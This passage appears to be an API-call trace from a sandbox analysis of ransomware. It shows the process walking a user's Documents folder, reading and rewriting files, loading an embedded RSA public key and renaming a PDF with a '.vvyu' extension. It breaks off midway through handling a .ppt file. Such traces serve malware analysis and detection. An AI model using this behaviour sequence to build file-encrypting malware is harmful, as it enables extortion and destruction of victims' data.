RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9690) returned 0x2d43778 [0184.563] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31450 [0184.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e930 [0184.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31498 [0184.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e948 [0184.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e978 [0184.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9d8 [0184.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e990 [0184.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.564] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9d8 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e990 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e978 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0184.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.566] GetCurrentThreadId () returned 0x264 [0184.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36c28 [0184.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.567] GetCurrentThreadId () returned 0x264 [0184.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9d8 [0184.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e978 [0184.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e990 [0184.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e960 [0184.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9f0 [0184.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0184.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9c0 [0184.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9a8 [0184.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea08 [0184.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9a8 [0184.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e978 [0184.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31498 | out: hHeap=0x6a0000) returned 1 [0184.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.577] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x968e, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x968e, lpOverlapped=0x0) returned 1 [0184.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.578] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9693, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.578] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0184.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0184.580] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.580] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.580] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.580] CloseHandle (hObject=0x584) returned 1 [0184.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0184.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d41908 [0184.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0184.583] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\BFlHqgTM.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\bflhqgtm.pdf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\BFlHqgTM.pdf.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\bflhqgtm.pdf.vvyu")) returned 1 [0184.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.585] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.589] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8588a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31498 [0184.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31498 | out: hHeap=0x6a0000) returned 1 [0184.589] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\desktop.ini") returned=".ini" [0184.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.589] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d2808d0, ftCreationTime.dwHighDateTime=0x1d8a212, ftLastAccessTime.dwLowDateTime=0xfc5987a0, ftLastAccessTime.dwHighDateTime=0x1d8a4a3, ftLastWriteTime.dwLowDateTime=0xfc5987a0, ftLastWriteTime.dwHighDateTime=0x1d8a4a3, nFileSizeHigh=0x0, nFileSizeLow=0xd83e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E ri1atxOTxxvZ19.ppt", cAlternateFileName="ERI1AT~1.PPT")) returned 1 [0184.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31498 [0184.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0184.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31498 | out: hHeap=0x6a0000) returned 1 [0184.590] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\E ri1atxOTxxvZ19.ppt") returned=".ppt" [0184.590] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\E ri1atxOTxxvZ19.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\e ri1atxotxxvz19.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.592] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=55358) returned 1 [0184.592] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.594] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd818, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.595] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.598] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.598] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xd83e, lpOverlapped=0x0) returned 1 [0184.599] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.599] lstrlenA (lpString="-----BEGIN PUBLIC 